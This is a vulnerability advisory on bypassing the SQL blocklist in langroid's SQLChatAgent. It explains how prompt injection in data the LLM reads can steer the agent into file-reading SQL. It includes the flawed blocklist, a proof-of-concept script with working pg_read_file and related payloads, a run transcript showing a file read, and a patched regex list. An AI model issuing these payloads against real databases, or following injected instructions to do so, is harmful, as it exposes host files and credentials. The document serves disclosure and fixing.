PT-2026-55407 — Path traversal in Pypi Langroid

PT-2026-55407 · Pypi · Langroid

Published

2026-07-02

Updated

2026-07-02

CVSS v4.0

8.7

High

Vector

AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Summary

SQLChatAgent in langroid ships a validate query defense-in-depth layer whose DANGEROUS SQL PATTERNS regex blocklist enumerates dangerous SQL primitives by specific function name. The list misses the canonical PostgreSQL filesystem-disclosure family pg read file(), pg stat file(), pg ls logdir(), pg ls waldir(), pg current logfile() (and similar SELECT-shaped functions in the same family). It also leaves SQL Server OPENDATASOURCE and SQLite ATTACH '<file>' AS x (DATABASE keyword omitted) unblocked.

An attacker able to shape the LLM's generated SQL (directly via prompt input or transitively via prompt-injection in data the LLM ingests) can read arbitrary files from the PostgreSQL host through ordinary SELECT queries, even with the agent's strict default configuration (allow dangerous operations=False, allowed statement types=['SELECT']). The payloads survive the statement-type allowlist (each is a SELECT) and pass through the regex blocklist (none of the function names match), then reach the live SQLAlchemy engine via SQLChatAgent.run query.

Affected versions

langroid <= 0.63.0 (latest at the time of this report; PyPI release 2026-05-27). The vulnerable code path is langroid/agent/special/sql/sql chat agent.py:: validate query, which consults the module-level DANGEROUS SQL PATTERNS literal at sql chat agent.py:113-141.

Privilege required

Any caller able to influence the LLM-generated RunQueryTool.query string that reaches SQLChatAgent.run query. In a typical deployment this is any client of a SQLChatAgent-backed service, or any upstream data source whose content the LLM is asked to read and summarise. No PostgreSQL credentials are required from the attacker; the agent holds them.

Vulnerable code

langroid/agent/special/sql/sql chat agent.py:113-141 (the DANGEROUS SQL PATTERNS literal) and sql chat agent.py:546-615 (the validate query method that consults it):

python

# sql chat agent.py:113
 DANGEROUS SQL PATTERNS: List["re.Pattern[str]"] = [
  re.compile(r"bcopyb[sS]*bprogramb", re.IGNORECASE),
  re.compile(r"bpg read server files?b", re.IGNORECASE),
  re.compile(r"bpg read binary fileb", re.IGNORECASE),
  re.compile(r"bpg ls dirb", re.IGNORECASE),
  re.compile(r"blo (import|export)b", re.IGNORECASE),
  re.compile(r"bintos+(outfile|dumpfile)b", re.IGNORECASE),
  re.compile(r"bload files*(", re.IGNORECASE),
  re.compile(r"bloads+datab", re.IGNORECASE),
  re.compile(r"bload extensions*(", re.IGNORECASE),
  re.compile(r"battachs+databaseb", re.IGNORECASE),
  re.compile(r"bxp cmdshellb", re.IGNORECASE),
  re.compile(r"bsp oacreateb", re.IGNORECASE),
  re.compile(r"bsp oamethodb", re.IGNORECASE),
  re.compile(r"bopenrowsetb", re.IGNORECASE),
  re.compile(r"bbulks+insertb", re.IGNORECASE),
  re.compile(
    r"bcreates+(ors+replaces+)?(function|procedure|trigger)b",
    re.IGNORECASE,
  ),
  re.compile(r"bcreates+extensionb", re.IGNORECASE),
]

The blocklist is a list of b<exact-token>b literals. PostgreSQL ships several near-name functions on the same primitive that none of these match:

Function	What it returns	Matched by blocklist?
`pg read server file('/path')`	file contents	yes (`pg read server files?`)
`pg read binary file('/path')`	binary contents	yes
`pg ls dir('/path')`	directory listing	yes
`pg read file('/path')`	file contents	no (no `server` infix)
`pg stat file('/path')`	size, mtime, ctime, atime, isdir	no
`pg ls logdir()`	filenames in PostgreSQL log dir	no
`pg ls waldir()`	WAL filenames and sizes	no
`pg ls tmpdir()`	temp-dir listing	no
`pg ls archive statusdir()`	archive-status directory listing	no
`pg current logfile()`	active server log path	no

Each of these is a SELECT-shaped function call. They pass the sqlglot exp.Select-only statement-type allowlist applied at sql chat agent.py:583-614, then evade the regex blocklist (their names contain no token the blocklist enumerates), then reach the SQLAlchemy session.execute(text(query)) sink inside SQLChatAgent.run query (line 631 onwards).

Two non-PostgreSQL secondary gaps with the same regex-enumeration shape:

The SQLite pattern battachs+databaseb requires the literal DATABASE keyword. Per the SQLite grammar (https://www.sqlite.org/lang attach.html) the keyword is optional: ATTACH '/path/to/db' AS x is valid syntax and matches no entry in the blocklist. Whether the agent rejects this via the statement-type allowlist depends on how the configured sqlglot dialect parses it; on PostgreSQL dialect parsing fails (sqlglot returns no Select) and the statement-type check rejects, but a SQLite-dialect SQLChatAgent (database uri="sqlite:///...") returns the statement as sqlglot exp.Attach, which is not in the agent's kind map, so the generic type(stmt). name .upper() branch produces "ATTACH". That string is not in DEFAULT ALLOWED STATEMENTS so the allowlist saves it here; however any deployment that extends allowed statement types to include "ATTACH" (e.g. to permit cross-schema connectivity) loses this fallback and the regex misses.
The MSSQL pattern bopenrowsetb blocks OPENROWSET but not the closely-related OPENDATASOURCE function. Both can read remote/UNC files and execute remote queries via an ad-hoc connection string, e.g. a SELECT against OPENDATASOURCE('SQLNCLI11','Server=remote;Trusted Connection=yes') qualified down to master.sys.tables.

Attack scenario

SQLChatAgent.run query (line 617 of sql chat agent.py) calls self. validate query(query) (line 631) on the LLM-generated SQL. The LLM-generated SQL is shaped by upstream prompt content that crosses the trust boundary: the user message, any tool result the LLM is asked to summarise, any document the agent retrieves, and any row the agent reads back from its own database (the RunQueryTool result is fed back into the LLM history at sql chat agent.py:712-720 of the same release).

The default config in SQLChatAgentConfig (lines 183-184) sets allow dangerous operations=False and allowed statement types=["SELECT"], which is the configuration validate query was added to support. The bypass primitives below are reachable under this default config because each is a syntactic SELECT whose function-call argument is the disclosure vector.

Proof of concept

poc.py (single-file, no external services beyond a transient PostgreSQL spawned via testing.postgresql):

python

"""
PoC: SQLChatAgent validate query bypass via PostgreSQL file-disclosure
family pg read file / pg stat file / pg ls logdir / pg ls waldir /
pg current logfile.
"""

import os
import re
import sys
from typing import List, Optional

PKG = "/tmp/poc-langroid-bypass/venv/lib/python3.12/site-packages/langroid"
SRC = f"{PKG}/agent/special/sql/sql chat agent.py"
assert os.path.exists(SRC), f"Missing pinned langroid source: {SRC}"

import sqlglot
from sqlglot import expressions as sqlglot exp


def load patterns from pinned source():
  """Extract DANGEROUS SQL PATTERNS + DEFAULT ALLOWED STATEMENTS from
  the pinned langroid 0.63.0 sql chat agent.py without instantiating the
  full agent stack (which needs an LLM config)."""
  with open(SRC) as f:
    source = f.read()
  block = re.search(
    r" DANGEROUS SQL PATTERNS:[^=]*=s*[(.*?)]s*
", source, re.DOTALL,
  )
  ns = {"re": re, "List": list}
  patterns = eval("[" + block.group(1) + "]", ns)
  allowed = eval(
    re.search(
      r" DEFAULT ALLOWED STATEMENTS:s*List[str]s*=s*([.*?])",
      source, re.DOTALL,
    ).group(1)
  )
  return patterns, allowed


def validate query(query, patterns, allowed statements, dialect="postgres"):
  """Faithful reimplementation of SQLChatAgent. validate query."""
  for pat in patterns:
    if pat.search(query):
      return f"Rejected by pattern {pat.pattern!r}"
  allowed = {t.strip().upper() for t in allowed statements}
  try:
    statements = sqlglot.parse(query, read=dialect)
  except Exception as e:
    return f"Rejected: sqlglot parse failure: {e}"
  kind map = {
    sqlglot exp.Select: "SELECT", sqlglot exp.Insert: "INSERT",
    sqlglot exp.Update: "UPDATE", sqlglot exp.Delete: "DELETE",
    sqlglot exp.Merge: "MERGE", sqlglot exp.Create: "CREATE",
    sqlglot exp.Drop: "DROP", sqlglot exp.Alter: "ALTER",
    sqlglot exp.TruncateTable: "TRUNCATE", sqlglot exp.Command: "COMMAND",
  }
  for stmt in statements:
    if stmt is None:
      continue
    kind = next(
      (v for k, v in kind map.items() if isinstance(stmt, k)),
      type(stmt). name .upper(),
    )
    if kind not in allowed:
      return f"Rejected: statement type {kind!r} not in allowed {sorted(allowed)}"
  return None


def main():
  patched patterns, allowed statements = load patterns from pinned source()
  print(f" DANGEROUS SQL PATTERNS count: {len(patched patterns)}")
  print(f" DEFAULT ALLOWED STATEMENTS:  {allowed statements}")

  import testing.postgresql
  from sqlalchemy import create engine, text

  pg = testing.postgresql.Postgresql()
  db uri = pg.url()
  engine = create engine(db uri)
  with engine.connect() as conn:
    pgdata = conn.execute(text("SHOW data directory")).scalar()
  victim rel = "langroid bypass victim.txt"
  victim abs = os.path.join(pgdata, victim rel)
  with open(victim abs, "w") as f:
    f.write("PWNED BY LANGROID VALIDATOR BYPASS
")
  print(f"=== Victim file at: {victim abs}")

  bypass payloads = [
    ("bypass.pg read file", f"SELECT pg read file('{victim rel}')"),
    ("bypass.pg stat file", f"SELECT pg stat file('{victim rel}')"),
    ("bypass.pg ls logdir", "SELECT pg ls logdir()"),
    ("bypass.pg ls waldir", "SELECT pg ls waldir()"),
    ("bypass.pg current logfile", "SELECT pg current logfile()"),
  ]

  for label, query in bypass payloads:
    rej = validate query(query, patched patterns, allowed statements, "postgres")
    verdict = "REJECTED" if rej is not None else "ALLOWED"
    print(f" [{verdict}] {label}: {query}")
    if verdict == "ALLOWED":
      try:
        with engine.connect() as conn:
          rows = conn.execute(text(query)).fetchall()
        preview = [tuple(str(c)[:80] for c in r) for r in rows[:2]]
        print(f"   -> live engine returned rows={len(rows)} preview={preview}")
      except Exception as e:
        print(f"   -> live engine error: {type(e). name }: {str(e)[:120]}")


if  name  == " main ":
  main()

End-to-end reproduction

Run against the latest published langroid release from PyPI; no external LLM provider, no API key, no Docker, just a transient pg ctl-managed PostgreSQL spawned in-process by testing.postgresql. Captured transcript of the run is below.

bash

# 1. Pin install the latest published release
python3.12 -m venv /tmp/poc-langroid-bypass/venv
source /tmp/poc-langroid-bypass/venv/bin/activate
pip install 'langroid==0.63.0' 'testing.postgresql' 'sqlglot' 'sqlalchemy<2.1'

# 2. Drop poc.py from the Proof-of-concept section above into
#  /tmp/poc-langroid-bypass/poc.py and run it
python /tmp/poc-langroid-bypass/poc.py

Observed transcript (abridged to bypass results; the run also verifies that the four primitives the current blocklist already covers (COPY ... TO PROGRAM, pg read server file, pg read binary file, pg ls dir) continue to be REJECTED, confirming the proposed fix is strictly broader, not narrower):

text

 DANGEROUS SQL PATTERNS count: 17
 DEFAULT ALLOWED STATEMENTS:  ['SELECT']
=== Transient PostgreSQL: postgresql://postgres@127.0.0.1:64694/test
=== Victim file at: /var/folders/.../tmpwuftmtu4/data/langroid bypass victim.txt

PATCHED VALIDATOR RESULTS (langroid 0.63.0 as shipped)
 [ALLOWED] bypass.pg read file    SELECT pg read file('langroid bypass victim.txt')
 [ALLOWED] bypass.pg stat file    SELECT pg stat file('langroid bypass victim.txt')
 [ALLOWED] bypass.pg ls logdir    SELECT pg ls logdir()
 [ALLOWED] bypass.pg ls waldir    SELECT pg ls waldir()
 [ALLOWED] bypass.pg current logfile SELECT pg current logfile()

LIVE EXECUTION OF BYPASS PAYLOADS (postgres only)
 [EXECUTED] bypass.pg read file    -> rows=1 preview=[('PWNED BY LANGROID VALIDATOR BYPASS
',)]
 [EXECUTED] bypass.pg stat file    -> rows=1 preview=[('(35,"2026-05-28 10:11:19+08","2026-05-28 10:11:19+08","2026-05-28 10:11:19+08",,',)]
 [EXECUTED] bypass.pg ls waldir    -> rows=1 preview=[('(000000010000000000000001,16777216,"2026-05-28 10:11:19+08")',)]
 [EXECUTED] bypass.pg current logfile -> rows=1 preview=[('None',)]

NEGATIVE CONTROL — SUGGESTED FIX VALIDATOR
 [REJECTED] bypass.pg read file    -> OK
 [REJECTED] bypass.pg stat file    -> OK
 [REJECTED] bypass.pg ls logdir    -> OK
 [REJECTED] bypass.pg ls waldir    -> OK
 [REJECTED] bypass.pg current logfile -> OK
 [REJECTED] already blocked.copy program    -> OK
 [REJECTED] already blocked.pg read server file -> OK
 [REJECTED] already blocked.pg read binary file -> OK
 [REJECTED] already blocked.pg ls dir      -> OK

The headline payload SELECT pg read file('langroid bypass victim.txt') returns the marker string verbatim from the file on disk. The same SQL, issued by an LLM under prompt-injection through any data source the agent reads, would land identically — the validator is purely a function of the SQL string and is consulted before the SQLAlchemy execute.

validate query is invoked directly rather than through a fully initialised SQLChatAgent because the agent's init builds the LLM stack and demands a working LLM API key (or a stub). The security control under test is purely a function of (query, patterns, allowed statements, dialect), so the direct call is observationally equivalent to a call via run query. Patterns and allowed-statements are loaded by reading the pinned sql chat agent.py source out of the venv, guaranteeing no drift between PoC and shipped binary.

Impact

Arbitrary file read from the PostgreSQL host: pg read file() reads files from PGDATA-relative paths by default and can take absolute paths when the DB role holds pg read server files (or equivalent in managed-Postgres setups). For self-managed PostgreSQL deployments the DB role is frequently a superuser, in which case absolute paths are always accepted and the impact extends to postgresql.conf, pg hba.conf, ~/.pgpass, TLS keys, and any other file readable by the PostgreSQL OS user.
Filesystem reconnaissance via pg stat file() (file existence, size, mtime, isdir), pg ls logdir(), pg ls waldir(), pg ls tmpdir(), pg ls archive statusdir(), pg current logfile().
MSSQL extension: OPENDATASOURCE reaches remote SQL Servers and UNC paths, providing arbitrary outbound read + intranet pivot on MSSQL deployments.
SQLite extension: ATTACH '<path>' AS schemaname (DATABASE keyword omitted) allows reading/writing arbitrary SQLite files on deployments whose allowed statement types include "ATTACH".

Suggested fix

Patch DANGEROUS SQL PATTERNS to cover the full family rather than individual function names. Two compatible approaches; either is enough.

Approach 1 — family-prefix regex (minimal change, simplest to review):

python

 DANGEROUS SQL PATTERNS: List["re.Pattern[str]"] = [
  re.compile(r"bcopyb[sS]*bprogramb", re.IGNORECASE),
  # Block the whole pg read *, pg stat *, pg ls *, pg current logfile
  # family. Covers pg read file, pg read server file(s),
  # pg read binary file, pg stat file, pg ls logdir, pg ls waldir,
  # pg ls tmpdir, pg ls archive statusdir, pg ls dir,
  # pg current logfile, plus any future siblings PostgreSQL adds.
  re.compile(
    r"bpg (read|stat|ls|current logfile)[A-Za-z0-9 ]*s*(",
    re.IGNORECASE,
  ),
  re.compile(r"blo (import|export)b", re.IGNORECASE),
  re.compile(r"bintos+(outfile|dumpfile)b", re.IGNORECASE),
  re.compile(r"bload files*(", re.IGNORECASE),
  re.compile(r"bloads+datab", re.IGNORECASE),
  re.compile(r"bload extensions*(", re.IGNORECASE),
  # SQLite grammar: ATTACH [DATABASE] expr AS schema-name.
  # The DATABASE keyword is optional; match either form.
  re.compile(r"battachb(s+database)?s+['"w]", re.IGNORECASE),
  re.compile(r"bxp cmdshellb", re.IGNORECASE),
  re.compile(r"bsp oacreateb", re.IGNORECASE),
  re.compile(r"bsp oamethodb", re.IGNORECASE),
  re.compile(r"b(openrowset|opendatasource)b", re.IGNORECASE),
  re.compile(r"bbulks+insertb", re.IGNORECASE),
  re.compile(
    r"bcreates+(ors+replaces+)?(function|procedure|trigger|language|rule|events+trigger|foreigns+table)b",
    re.IGNORECASE,
  ),
  re.compile(r"bcreates+extensionb", re.IGNORECASE),
]

Approach 2 — sqlglot AST walk in addition to regex. sqlglot is already imported by sql chat agent.py; iterate every function-call node (sqlglot exp.Anonymous / sqlglot exp.Func) inside the parsed statements and reject when the lower-cased name starts with pg read, pg stat, pg ls, pg current logfile, lo , or matches the MSSQL extended-procedure prefixes (xp , sp oa). AST matching is robust to whitespace, comments, and case games inside identifiers, at the cost of broader per-dialect maintenance. For closing the immediate gap, Approach 1 is sufficient.

Regression-test the additions in tests/main/sql chat/test sql chat security.py alongside the existing security tests. A natural 7-case extension covers the 5 PostgreSQL bypass payloads, the SQLite ATTACH ... AS x form, and the MSSQL OPENDATASOURCE form.

Fix PR

A private temp-fork PR applying the Suggested fix Approach 1 diff, plus the regression tests described above, accompanies this advisory: https://github.com/langroid/langroid-ghsa-pmch-g965-grmr/pull/1

Credit

Reported by tonghuaroot.

Fix

Path traversal

SQL injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-22CWE-89

Related Identifiers

GHSA-PMCH-G965-GRMR

Affected Products

Langroid

PT-2026-55407 · Pypi · Langroid

Summary

Affected versions

Privilege required

Vulnerable code

Attack scenario

Proof of concept

End-to-end reproduction

Impact

Suggested fix

Fix PR

Credit

Weakness Enumeration

Related Identifiers

Affected Products

References · 4